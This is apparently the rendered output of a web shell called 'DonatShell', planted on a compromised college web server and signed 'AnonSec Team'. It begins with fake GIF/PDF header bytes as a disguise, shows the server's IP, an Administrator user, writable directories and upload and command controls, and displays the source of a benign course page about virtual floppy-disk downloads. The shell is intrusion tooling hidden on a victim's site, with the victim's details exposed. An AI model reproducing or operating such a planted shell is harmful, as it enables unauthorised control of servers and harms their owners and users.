GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/_Archive/CST1861/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/_Archive/CST1861//DataDisk.php
<?
// DataDisk.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
//// Uncomment for after section authentication.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('classInfo.phpinc');
$title = "Data Disk";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$sectionTitle = "Data Disk";
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
?>
<fieldset><legend>Data Disk</legend><span class="normal">
<?=$textbook['Title1']?><?=$textbook['Edition1Edition']?> comes with a data disk.
This disk is used throughout the exercises in the book.
<br />
If you do not have a floppy drive then you can use the <a href="#VirtualDisk">Virtual Disk Instructions</a> below to emulate one.
<br />
If you have a floppy drive and do not have the disk or need a fresh copy of it you can use the <a href="#FloppyDisk">Floppy Disk Instructions</a> below to create one.

<a name="VirtualDisk" id="VirtualDisk"></a>
<fieldset><legend>Virtual Disk Instructions</legend><span class="normal">
If you do not have a floppy drive:<br />
<span class="normal">You will need to emulate the existance of a floppy disk.</span>
<ol>
	<li class="bold">First, download vfd and disk images.
		<ol type="i">
			<li>Create a folder such as <b>D:\<?=$courseNumber?></b> to hold your <?=$courseNumber?> files.</li>
			<li>Download the floppy drive emulation software <a href="dn/vfd.zip">vfd.zip</a> to your folder.</li>
			<li>Download the <a href="dn/Disk.IMA">Disk.IMA</a> and backup copy <a href="dn/DataDisk.IMA">DataDisk.IMA</a> to your folder.</li>
			<li>Open your folder.</li>
			<li>Extract the <b>vfd.zip</b> file into your folder. This will create a sub-folder called <b>vfd</b>.<br /><img src="vfd/vfpZip.jpg" /></li>
		</ol>
	</li>
	<li class="bold">Second, install and configure vfd.
		<ol type="i">
			<li>Open the <b>vfd</b> subfolder and run <b>vfdwin.exe</b>.<br /><img src="vfd/vfdFolder.jpg" />&nbsp;<img src="vfd/vfdwin.jpg" /></li>
			<li>From the <b>Driver</b> panel, cick on <b><u>I</u>nstall</b>.<br /><img src="vfd/vfd00.jpg" /></li>
			<li>From the <b>Driver</b> panel, cick on <b><u>S</u>tart</b>.<br /><img src="vfd/vfd00s.jpg" /></li>
			<li>Then change to the <b>Drive0</b> panel and cick on <b>Change...</b>.<br /><img src="vfd/vfd01.jpg" /></li>
			<li>Change the <b>Drive Letter:</b> to A:, make sure <b>Persistent / Global</b> is checked, and click on <b>OK</b>.<br /><img src="vfd/vfd02.jpg" />&nbsp;<img src="vfd/vfd03.jpg" />&nbsp;<img src="vfd/vfd04.jpg" /></li>
			<li>Click on the <b>Association</b> tab.<br /><img src="vfd/vfd05.jpg" /></li>
			<li>Make sure the <b>.ima</b> checkbox is checked and click <b><u>A</u>pply</b>.<br /><img src="vfd/vfd06.jpg" />&nbsp;<img src="vfd/vfd07.jpg" /></li>
			<li>Click on the <b>Shell</b> tab.<br /><img src="vfd/vfd08.jpg" /></li>
			<li>Make sure the <b>Context menu, drag & drop handler and drive property sheet</b> checkbox is checked and click <b><u>A</u>pply</b>.<br /><img src="vfd/vfd09.jpg" />&nbsp;<img src="vfd/vfd10.jpg" /></li>
			<li>Close the <b>VFD Control Panel</b>.<br /><img src="vfd/vfd11.jpg" /></li>
		</ol>
	</li>
	<li class="bold">Third, open a disk image and use it as a virtual A: drive.
		<ol type="i">
			<li>One way to open a disk image is to double-click on it.<br /><img src="vfd/DiskIMA.jpg" /></li>
			<li>Another way is to open up <b>My Computer</b> and right-click on the A: drive and select <b>Open VFD image...</b><br /><img src="vfd/vfdOpen.jpg" /></li>
		</ol>
	</li>
	<li class="bold">Fourth, manage your virtual drive.
		<ol type="i">
			<li>One way is to open the <b>vfd</b> subfolder and run <b>vfdwin.exe</b>.<br /><img src="vfd/vfdFolder.jpg" />&nbsp;<img src="vfd/vfdwin.jpg" /></li>
			<li>Another way is to open up <b>My Computer</b> and right-click on the A: drive for options.<br /><img src="vfd/vfdOptions.jpg" /></li>
		</ol>
	</li>	
</ol>

</span></fieldset>

<a name="FloppyDisk" id="FloppyDisk"></a>
<fieldset><legend>Floppy Disk Instructions</legend><span class="normal">
If you have a floppy drive:<br />
You can download <a href="dn/CST1861.exe">CST1861.exe</a> and use it to place the files on a diskette.
<ol type="i">
	<li>Create a folder such as <b>D:\<?=$courseNumber?></b> to hold your <?=$courseNumber?> files.</li>
	<li>Download the self extracting archive <a href="dn/CST1861.exe">CST1861.exe</a> to your folder.</li>
	<li>Place a blank, formatted diskette in your A: drive.</li>
	<li>Open your folder and double-click the <b>CST1861.exe</b> file.<br /><img src="fd/folder.jpg" />&nbsp;<img src="fd/exe.jpg" /></li>
	<li>Click <b>Install</b> to extract the files onto the diskette.<br /><img src="fd/extract.jpg" /></li>
</ol>
</span></fieldset>

<fieldset><legend>Downloads</legend><span class="normal">
<a href="dn/CST1861.exe">CST1861.exe</a> <span class="normal">Used to place data files on a diskette. It can also re-write the data files to a vfd image.</span><br />
<a href="dn/DataDisk.IMA">DataDisk.IMA</a> <span class="normal">A backup copy of the data disk image.</span><br />
<a href="dn/Disk.IMA">Disk.IMA</a> <span class="normal">The data disk image used with the Virtual Floppy Drive program.</span><br />
<a href="dn/vfd.zip">vfd.zip</a> <span class="normal">Virtual Floppy Drive ulitity program.</span>
</span></fieldset>

</span></fieldset>

<?
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');
?>

Anon7 - 2022
AnonSec Team